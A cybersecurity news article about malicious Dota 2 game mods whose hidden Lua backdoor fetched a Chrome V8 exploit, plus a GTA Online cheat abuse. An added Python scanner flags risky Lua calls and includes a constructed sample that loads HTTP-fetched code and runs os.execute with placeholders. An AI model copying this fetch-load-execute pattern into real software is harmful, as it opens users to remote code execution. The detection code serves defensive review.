Security researchers have uncovered four malicious game modes for the popular Dota 2 multiplayer online battle arena video game that were created by a malicious actor and uploaded to the Steam store. Jan Vojtěšek, a malware researcher at Avast Threat Labs, named three of the game mods: Overdog no annoying heroes, Custom Hero Brawl, and Overthrow RTZ Edition X10 XP. The mods contained a snippet of Lua code that could be used to log, execute arbitrary system commands, create coroutines, and make HTTP GET requests. The malicious code was difficult to detect because it was hidden in the twenty lines of code shipped with the three newer game mods. This backdoor enabled the attacker to remotely execute commands on infected devices, potentially allowing them to install further malware. It also allowed the execution of any JavaScript fetched over HTTP, giving the attacker the ability to modify the exploit code without going through the game mode verification process. On compromised systems, the backdoor was used to download an exploit for CVE-2021-38003, a Chrome V8 vulnerability that was exploited in the wild as a zero-day and patched in October 2021. Avast reported its findings to Valve, the developer of Dota 2, which updated the vulnerable V8 version on January 12, 2023 and removed the malicious game mods. According to Valve, fewer than 200 players were affected by the attack.

In a similar incident, a Grand Theft Auto Online remote code execution vulnerability was exploited by the developer of the North GTA cheat, who added features to ban and corrupt players' accounts in a version released on January 20, 2023. The cheat developer removed the features in a new version on January 21 and apologized for the chaos caused by the cheat's users. Rockstar Games, the developer of GTA, released a security update to address the Grand Theft Auto Online issue on February 2.
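The capability mix described above (fetch over HTTP, load the response as code, run system commands, spawn coroutines) is what a reviewer of community game modes would want to surface before a mod is published. The following is an added example, not code from the article, Avast or Valve: a small static triage scanner for Lua mod source. The standard Lua names it matches (`os.execute`, `io.popen`, `load`, `loadstring`, `dofile`, `coroutine.create`) are real; `HTTPRequest` and `http_get` are hypothetical stand-ins for whatever HTTP helper a game engine exposes, and both mod snippets are constructed samples, not the real Dota 2 mods.

```python
"""Static triage of Lua game-mod source for the backdoor capability classes
named in the article: system command execution, dynamic code loading,
HTTP fetching and coroutine creation.  Added example; engine-specific
HTTP helper names are an assumption, and the sample mods are constructed."""
import re
from dataclasses import dataclass, field

# Capability class -> regex over a line of Lua source.
# Standard Lua names are real; "HTTPRequest"/"http_get" are hypothetical
# placeholders for the engine's HTTP helper (adjust for the real engine API).
CAPABILITIES = {
    "exec_command": re.compile(r"\b(os\.execute|io\.popen)\s*\("),
    "dynamic_load": re.compile(r"\b(load|loadstring|dofile)\s*\("),
    "http_fetch":   re.compile(r"\b(HTTPRequest|http_get)\s*\(", re.IGNORECASE),
    "coroutine":    re.compile(r"\bcoroutine\.(create|wrap)\s*\("),
}


@dataclass
class Finding:
    capability: str
    line_no: int
    text: str


@dataclass
class Report:
    findings: list = field(default_factory=list)

    @property
    def capabilities(self):
        return {f.capability for f in self.findings}

    @property
    def remote_code_load(self):
        # The combination the article describes: content fetched over HTTP
        # is handed to a Lua loader.  Either half alone can be legitimate;
        # together they warrant manual review before the mod is approved.
        return {"http_fetch", "dynamic_load"} <= self.capabilities


def strip_comments(line):
    """Drop a Lua single-line comment so commented-out code is not flagged.
    (Naive: does not handle '--[[ ]]' block comments or '--' inside strings.)"""
    return line.split("--", 1)[0]


def scan_lua(source):
    """Return a Report listing every capability hit with its line number."""
    report = Report()
    for n, raw in enumerate(source.splitlines(), 1):
        line = strip_comments(raw)
        for cap, rx in CAPABILITIES.items():
            if rx.search(line):
                report.findings.append(Finding(cap, n, raw.strip()))
    return report


# Constructed sample: ordinary custom-game logic that only uses a coroutine.
BENIGN_MOD = """
-- constructed benign sample
function OnHeroSpawn(hero)
  print("spawned " .. hero)
  local ticker = coroutine.create(function() return 1 end)  -- game timer
end
"""

# Constructed sample mirroring the capability mix in the article.  The URL
# and command are placeholders; nothing here is the real backdoor.
SUSPICIOUS_MOD = """
-- constructed suspicious sample
local body = HTTPRequest("GET", "http://example.invalid/stage2")  -- placeholder URL
local fn = load(body)
os.execute("PLACEHOLDER_COMMAND")
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_MOD), ("suspicious", SUSPICIOUS_MOD)):
        r = scan_lua(src)
        print(f"{name}: capabilities={sorted(r.capabilities)} "
              f"remote_code_load={r.remote_code_load}")
        for f in r.findings:
            print(f"  line {f.line_no}: [{f.capability}] {f.text}")
```

The scanner deliberately reports individual capabilities and a combined verdict separately: a mod that only spawns coroutines is normal, while one that both fetches over HTTP and passes data to `load` is the pattern that let the attacker swap payloads without re-entering the game mode verification process.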
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 08 Feb 2023 19:58:02 +0000